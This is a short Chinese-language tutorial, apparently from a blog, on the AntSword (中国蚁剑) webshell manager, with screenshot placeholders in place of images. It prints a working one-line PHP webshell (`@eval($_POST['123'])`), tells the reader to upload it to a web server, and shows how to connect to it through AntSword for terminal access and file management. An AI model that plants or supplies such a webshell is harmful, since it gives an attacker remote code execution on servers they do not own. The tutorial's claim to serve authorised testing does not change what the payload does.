Bootstrap

webshell管理工具之蚁剑使用

一. 概述

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

二. 使用方法

1. 初始化蚁剑

解压文件AntSword-v2.0.3-windows-x64.zip,antSword-master.zip.
在这里插入图片描述

AntSword-v2.0.1为加载器
antSword-master为蚁剑源码

双击AntSword中的AntSword.exe。
在这里插入图片描述
点击初始化
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
完成
在这里插入图片描述

2. 上传小马到WEB服务器

<?php @eval($_POST['123']);?>

在这里插入图片描述

在这里插入图片描述

3. 使用蚁剑进行小马连接

在面板出,单击鼠标右键,点击添加数据
在这里插入图片描述
输入URL地址,也就是小马的完整URL, 还有POST中的密码
在这里插入图片描述
在这里插入图片描述
点击添加,连接成功
在这里插入图片描述

4. 功能介绍

  1. 虚拟终端操作
    在这里插入图片描述
  2. 文件管理

在这里插入图片描述

;